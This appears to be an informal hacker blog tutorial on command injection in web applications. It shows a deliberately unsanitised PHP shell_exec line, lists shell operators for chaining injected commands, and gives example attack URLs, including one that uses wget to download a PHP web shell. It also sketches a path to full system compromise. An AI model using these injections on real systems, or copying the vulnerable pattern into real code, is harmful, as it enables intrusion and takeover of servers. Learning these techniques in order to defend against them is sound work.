What you will need:
- At least a basic knowledge of unix systems
- A brain
The whole point of command injection is to inject and execute malicious commands specified by the attacker in the vulnerable application. Most of the time, web applications need to use backend programs or applications to their advantage in order to complete some functionality. This can prove to be disastrous because developers get lazy and don’t take proper measures to secure their scripts. This most likely leads to their system being compromised(lel)
Example of poor, lazy coding:
<?php echo shell_exec('cat '.$_GET['filename']); ?>
Why is this a problem?
I’m glad you asked. In case you don’t have any knowledge on PHP, this script accepts user input and is not sanitized, which is bad D: In a normal situation a user might go to a link like:
And it would display some example text:
Okay so all I have to do now is add a nice little semi-colon and a shell command to exploit this.
The output would be something like:
Here is some visible content, blah blah example.txt config.php IchiIsAwesome.txt
[0x0b]How to perform an attack:
In the last section I showed you a basic example of how command injection works. Now we’re gonna talk about different injections and how they’re executed.
It’s reasonable to assume that a develeoper with half a brain would filter out some of the most common forms of command injection, such as the semi-colon. Well, there’s ways around that Here’s some operators you can use:
Pipes allow the user to chain multiple commands together. It will redirect the output of one command straight to the next, so, you can execute unlimited commands by chaining them with multiple pipes. Cool? Yes.
Example: ; and $
Here you find the semi-colon in the original example. Adding a semicolon tells the command line to execute everything before the semicolon, then execute everything after like it’s on a fresh command line.
Example: $ and && and ||
These operators perform logical operations against the data, simple as that.
How they’re used:
- `shell_command` – executes the command
- $(shell_command) – executes the command
- | shell_command – executes the command and returns the output of the command
- || shell_command – executes the command and returns the output of the command
- ; shell_command – executes the command and returns the output of the command
- && shell_command executes the command and returns the output of the command
- > target_file – overwrites the target file with the output of the previous command
- >> target_file – appends the target file with the output of the previous command
- < target_file – send contents of target_file to the previous command
These are just a few examples of command injection vectors, get creative and use your imagination. If you have knowledge on the system you’re exploiting, it shouldn’t be hard.
www.example.com/viewcontent.php?file=example.txt&& wget [location of php shell]
www.example.com/viewcontent.php?file=example.txt&& ls -X
Command Injection is a extremely dangerous vulnerability as it can be used to escalate privileges on the system and gain complete control. It usually goes something like this:
- Establish a custom script that serves as a shell
- Monitor processes and audit the system
- Find other vulnerabilities and exploit them. Gain control. ???. Profit
All you need to exploit this deadly vulnerability is knowledge of the system you’re exploiting, either *nix or winhoes, and patience. I know it was a quick tutorial but there’s only so much I could write about before it became complete and utter spoon-feeding, and no one really benefits from that. Hope you enjoyed reading. I welcome constructive criticism on what I should add or take out and tips for future tuts, thanks
- Welcome to my site
- Admin CP Finder [Perl]